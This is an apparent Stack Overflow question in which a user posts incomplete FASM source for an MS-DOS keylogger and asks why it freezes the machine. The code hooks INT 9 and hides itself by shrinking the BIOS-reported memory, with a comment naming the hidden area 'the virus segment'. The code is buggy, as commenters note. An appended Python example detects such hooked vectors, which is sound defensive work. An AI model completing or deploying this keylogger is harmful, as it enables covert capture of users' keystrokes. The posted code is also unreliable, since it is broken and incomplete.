
I made a keylogger in FASM for MS-DOS; however, when I run it, it freezes my computer because something is wrong with the segment:offset memory used by my keylogger. This is the source that I coded:

```
cli
push es
mov ax,0
mov es,ax
es
mov bx,[24h]
es
mov dx,[26h]
es
mov [180h],cx
es
mov [182h],dx
PUSH DS
MOV BP,40H
MOV DS,BP
ds
dec word [13h]    ;Memory less by 1K
POP DS
int 12h         ;memory into AX
mov cl,6     ;because memory is in K
shl ax,cl
mov bp,ax ;ES is the virus segmentes
es
mov [24h],bx
es
mov [26h],bp
pop es
sti
push    es
mov             si,bp
mov             es,si
mov             si,code
mov             di,0
mov  cx,codesize-code

repz
movsb
pop             es
push    es
mov             si,bp
mov             es,si
mov             si,keys
mov      di,codesize-code+1024
mov             cx,36h
repz
movsb
pop             es
push            es
mov             ax,bp
mov             es,ax
mov             ax,codesize
mov             bx,codesize
mov             es,bp
es
mov             [bx],ax
pop             es
ret
code:
pushf
pushaw
sti
IN              AL,60H
mov             al,20h
out             20h,al
pop             es
pop             ds
popaw
popf
iret
keys db '',0
codesize:
buf db 1024 dup (0)
iret
```

If I use the segment:offset 2000:0 to store my Int 9 handler, this application works fine; however, if I use int 12h to get a memory segment to put the keylogger in, MS-DOS freezes. So what is wrong with my source above?

  • Your code is hard to read because it is neither indented well nor commented in a useful way. You might receive better answers if you fix both of these issues. – fuz Aug 29 '18 at 11:47
  • `mov [24h],bx` looks odd given that BX is the offset of the original Int 9 routine loaded near the beginning – Michael Petch Aug 29 '18 at 12:28
  • Yes, this is a COM application and on the first line is org 100h. How can I know the memory segment to initialize my `[26h]` segment? – B. Salvador Aug 29 '18 at 12:29
  • I already wrote this: `XOR bx,bx` `es` `mov [24h],bx` – B. Salvador Aug 29 '18 at 12:31
  • There is no xor bx, bx in this code. – Michael Petch Aug 29 '18 at 12:36
  • I asked you previously to show us your complete code, and even after the edit it still isn't complete. Please make this an [mcve]. The `org 100h` doesn't appear, and I don't see this `xor bx, bx` at all. You sure you are showing us the code you are using? – Michael Petch Aug 29 '18 at 12:38
  • If writing a DOS TSR you really should be looking at [Int 21h/AX=3100h](http://www.ctyme.com/intr/rb-2723.htm) – Michael Petch Aug 29 '18 at 12:43
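
From the defender's side, the memory trick the question describes (lowering the word at 0040:0013h, then pointing the INT 9 vector into the kilobyte that is no longer reported) leaves a checkable trace in low memory. The following is an added example, not part of the original post or its comments: it scans a low-memory image for interrupt vectors that point above the reported top of memory. The function names and the sample image are constructed for the illustration.

```python
import struct

BDA_MEM_KB = 0x413   # 0040:0013h, conventional memory size in KB (what INT 12h returns)
VIDEO_SEG = 0xA000   # first segment past the 640 KB conventional area

def top_segment(image: bytes) -> int:
    """Segment that INT 12h followed by `shl ax,6` yields (KB * 64 paragraphs)."""
    (kb,) = struct.unpack_from("<H", image, BDA_MEM_KB)
    return kb << 6

def read_vector(image: bytes, n: int) -> tuple[int, int]:
    """Return (segment, offset) of interrupt vector n from the IVT at 0000:0000."""
    off, seg = struct.unpack_from("<HH", image, n * 4)
    return seg, off

def suspicious_vectors(image: bytes) -> list[tuple[int, int, int]]:
    """Vectors whose handler lies between the reported memory top and A000:0000."""
    top = top_segment(image)
    hits = []
    for n in range(256):
        seg, off = read_vector(image, n)
        linear = (seg << 4) + off
        if (top << 4) <= linear < (VIDEO_SEG << 4):
            hits.append((n, seg, off))
    return hits

def build_sample(kb: int, int9: tuple[int, int]) -> bytes:
    """Constructed image of 0000:0000-0000:04FF; every vector in ROM except INT 9."""
    image = bytearray(0x500)
    for n in range(256):
        struct.pack_into("<HH", image, n * 4, 0xE000 + n, 0xF000)  # offset, segment
    struct.pack_into("<HH", image, 9 * 4, int9[1], int9[0])
    struct.pack_into("<H", image, BDA_MEM_KB, kb)
    return bytes(image)

if __name__ == "__main__":
    samples = {
        "clean": build_sample(640, (0xF000, 0xE987)),    # constructed values
        "hooked": build_sample(639, (0x9FC0, 0x0000)),   # constructed values
    }
    for name, img in samples.items():
        hits = suspicious_vectors(img)
        print(name, [(hex(n), f"{s:04X}:{o:04X}") for n, s, o in hits])
```

A memory size below 640 KB is not conclusive on its own, because many BIOSes reserve an extended BIOS data area the same way; the signal is an interrupt vector pointing into that region.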

0 Answers